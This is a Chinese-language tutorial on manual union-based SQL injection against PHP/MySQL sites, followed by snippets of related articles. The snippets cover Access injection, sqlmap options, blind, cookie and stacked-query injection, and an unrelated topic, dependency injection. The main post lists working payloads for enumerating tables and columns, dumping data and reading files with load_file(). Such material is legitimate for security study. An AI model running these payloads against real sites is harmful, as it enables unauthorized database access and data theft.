SQL注入(一)普通型注入

既然说了从头开始,先从注入开始吧,先来温习一下之前会的一些注入。

PHP注入

0x01:

判断是否存在注入:

‘   报错

‘ and 1=1   正确

‘ and 1=2   错误

0x01:

order by X  X表示整数,判断数据库共有多少个字段

‘ and 1=2 union select 1,2,3...  //列出所有字段,看页面上显示哪些字段,换成我么你想查询的数据

‘ and 1=2 union select 1,user(),3... //网页上显示2的地方换显示数据库用户用户名

这儿user()可换成:

database()    当前数据库

@@datadir   数据库地址

version()    数据库版本

load_file()    读取指定文件

。。。。。

‘ and 1=2 union select 1,TABLE_NAME,3 from information_schema.tables where TABLE_SCHEMA=database() limit 0,1 //爆表名

‘ and 1=2 union select 1,COLUMN_NAME,3 from information_schema.columns where TABLE_NAME=table_name limit 0,1   //爆列名

‘ and 1=2 union select  1, column,3 from table  //爆数据

注意事项:

注入中有时候需要注释部分语句,可以用

#  %23

+--+  //+表示链接,

空格可用%20

时间: 2025-01-04 21:10:58

SQL注入(一)普通型注入的相关文章

SQL注入原理 手工注入access数据库

SQL注入原理 手工注入access数据库 SQL注入是通过将SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL指令的目的. 1.判断网站是否有注入点. 在以asp?id=xx(任意数字)结尾的连接依次添加: ' 1=1 1=2 若以上结果显示"数据库出错","正常显示","数据库出错"则该网站存在注入点. 2.猜解表名 在链接末尾添加语句: and exists(select * from admi

基础篇——SQL注入(工具注入)

注入工具 上一篇介绍了SQL注入漏洞以及一些手工注入方法,本篇介绍一下注入工具 1.sqlmap sqlmap属于比较经典的一个注入工具,功能强大,还自带一些绕过参数 使用方法: sqlmap.py -u “url”  对url连接进行注入检测 然后使用注入参数进行注入 -u  //添加url进行检测 -dbs  //进行数据库检测 -tables  //猜解数据库表 -colums  //猜解字段 --level 1~5  //设置注入等级最高5级 --risk  1~3  //设置危险等级

基础篇——SQL注入(手工注入)

SQL注入 当我们学习一个知识时我们要考虑几个问题:是什么?怎么做?然后进行有条理的学习 是什么? 首先我们要明白SQL注入是什么: sql——结构化查询语言 SQL注入就是在网站url中插入sql语句,执行sql命令,获取数据库内容,达到欺骗服务器的目的. SQL注入的原理:普通用户提交sql查询语句,网站没有对用户输入进行过滤导致执行用户命令 危害及防护 危害:SQL注入可以使入侵者获取后台账号密码.拖库.进入后台破坏.拿shell 防护:设置网站黑名单.限制敏感词汇.对用户输入进行转义.将

StringEscapeUtils的常用使用,防止SQL注入及XSS注入

StringEscapeUtils类可以对html js xml  sql 等代码进行转义来防止SQL注入及XSS注入 添加依赖 <dependency> <groupId>commons-lang</groupId> <artifactId>commons-lang</artifactId> <version>2.6</version> </dependency> 1.html脚本 escapeHtml转义h

sql工具和手工注入总结

普通注入: 数字注入 字符注入 base64注入:和常规的方法没有说明区别,主要是解码然后编码: 如果普通注入不行,尝试大小写绕过,编码等绕过: 如果不行尝试盲注: 盲注: 基于报错的注入(随笔有总结) 延时注入:利用数据库延时特性,sleep(10),没有报错就说明存在注入 或者尝试cookie注入: cookie注入: 穿山甲(有cookie选项) sqlmap使用:sqlmap.py -u "http:www.xx.com/show.asp" --cookie "id=

Stacked injection--堆叠注入--堆查询注入

Stacked injection--堆叠注入--堆查询注入 原文地址;http://www.sqlinjection.net/stacked-queries/   本篇属于集合原作者的思路和个人想法结合的一篇产物.Stacked injection 汉语翻译过来后,国内有的称为堆查询注入,也有称之为堆叠注入.个人认为称之为堆叠注入更为准确.堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新 的查询或者终止查询,可以达到修改数据和调用存储过程的目的.这种技术在SQL注入中还是比较频繁的. 0x

如何判断是字符型注入还是整形注入

字符型注入和整形注入区别 通常 Sql 注入漏洞分为 2 种类型 数字型 字符型 其实所有的类型都是根据数据库本身表的类型所产生的,在我们创建表的时候会发现其后总有个数据类型的限制,而不同的数据库又有不同的数据类型,但是无论怎么分常用的查询数据类型总是以数字与字符来区分的,所以就会产生注入点为何种类型. 数字型判断 当输入的参 x 为整型时,通常 abc.php 中 Sql 语句类型大致如下: select * from <表名> where id = x 这种类型可以使用经典的 and 1=

依赖注入和依赖注入容器

http://www.digpage.com/di.html#di 为了降低代码耦合程度,提高项目的可维护性,Yii采用多许多当下最流行又相对成熟的设计模式,包括了依赖注入(Denpdency Injection, DI)和服务定位器(Service Locator)两种模式. 关于依赖注入与服务定位器, Inversion of Control Containers and the Dependency Injection pattern 给出了很详细的讲解,这里结合Web应用和Yii具体实现

IOC 构造函数注入vs属性注入

1.不管是构造函数注入还是属性注入,都要先把对象给new 出来,构造函数应该也是public.2.一般使用 配置文件,属性注入,不用使用特性,直接配置,初始化或依赖,凡是注入的,都要有访问权限,public.3.复杂的,一般 注册 构造函数和属性, 一起使用,配置一下就行,不用那么纠结.